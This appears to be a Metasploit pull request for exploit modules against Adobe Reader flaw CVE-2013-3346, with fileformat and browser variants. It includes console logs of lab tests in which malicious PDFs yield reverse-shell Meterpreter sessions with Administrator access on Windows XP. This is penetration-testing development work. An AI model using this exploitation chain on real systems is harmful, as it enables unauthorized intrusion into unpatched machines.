Add module for CVE-2013-3346

[jvazquez-r7]

As exploited on the wild on November 2013. Targeting Windows XP atm.

• Fileformat version: targets Adobe reader 9, 10, 11
• Browser version: targets Adobe Reader 10, 11 (Internet Explorer)

Verification

• Install Windows XP SP3
• Install a vulnerable version of Adobe Reader
• Use modules like in the demo, hopefully enjoy sessions

Demo

• Fileformat:

msf exploit(adobe_toolbutton) > use exploit/windows/fileformat/adobe_toolbutton 
msf exploit(adobe_toolbutton) > rexploit
[*] Reloading module...

[*] Creating 'msf.pdf' file...
[+] msf.pdf stored at /Users/juan/.msf4/local/msf.pdf

msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.172.244
[*] Meterpreter session 11 opened (192.168.172.1:4444 -> 192.168.172.244:2612) at 2013-12-16 13:40:20 -0600

meterpreter > getuid
sServer username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

• Browser

msf exploit(adobe_toolbutton) > rexploit
[*] Stopping existing job...

[*] Server stopped.
[*] Server stopped.
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.172.1:4444 
[*] Using URL: http://0.0.0.0:8080/YNxK0UmLGKp5o7
[*]  Local IP: http://10.6.0.165:8080/YNxK0UmLGKp5o7
[*] Server started.
msf exploit(adobe_toolbutton) > [*] 10.6.0.165       adobe_toolbutton - Gathering target information.
[*] 10.6.0.165       adobe_toolbutton - request: /YNxK0UmLGKp5o7/SvvljU/
[*] 10.6.0.165       adobe_toolbutton - Sending PDF...
[*] Sending stage (769024 bytes) to 192.168.172.244
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.244:1969) at 2013-12-16 13:26:01 -0600
msf exploit(adobe_toolbutton) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
emeterpreter > exit
[*] Shutting down Meterpreter...

[wchen-r7]

Tested the file format module against the following versions:

• 9.0.0
• 10.1.4
• 11.0.0

Tested the browser module:

Version 11.0.0:

msf exploit(adobe_toolbutton) > [*] 10.0.1.76        adobe_toolbutton - Gathering target information.
[*] 10.0.1.76        adobe_toolbutton - request: /vJyRX3LpVx7/OZQESX/
[*] 10.0.1.76        adobe_toolbutton - Sending PDF...
[*] Sending stage (769024 bytes) to 10.0.1.76
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.76:55130) at 2013-12-16 14:44:46 -0600

Version 10.1.2:

msf exploit(adobe_toolbutton) > [*] 10.0.1.76        adobe_toolbutton - Gathering target information.
[*] 10.0.1.76        adobe_toolbutton - request: /Kc0cLog6fmcooi/fnDgAG/
[*] 10.0.1.76        adobe_toolbutton - Sending PDF...
[*] Sending stage (769024 bytes) to 10.0.1.76
[*] Meterpreter session 2 opened (10.0.1.76:4444 -> 10.0.1.76:55152) at 2013-12-16 14:48:55 -0600

Both modules pass msftidy:

$ tools/msftidy.rb modules/exploits/windows/browser/adobe_toolbutton.rb 
$ tools/msftidy.rb modules/exploits/windows/fileformat/adobe_toolbutton.rb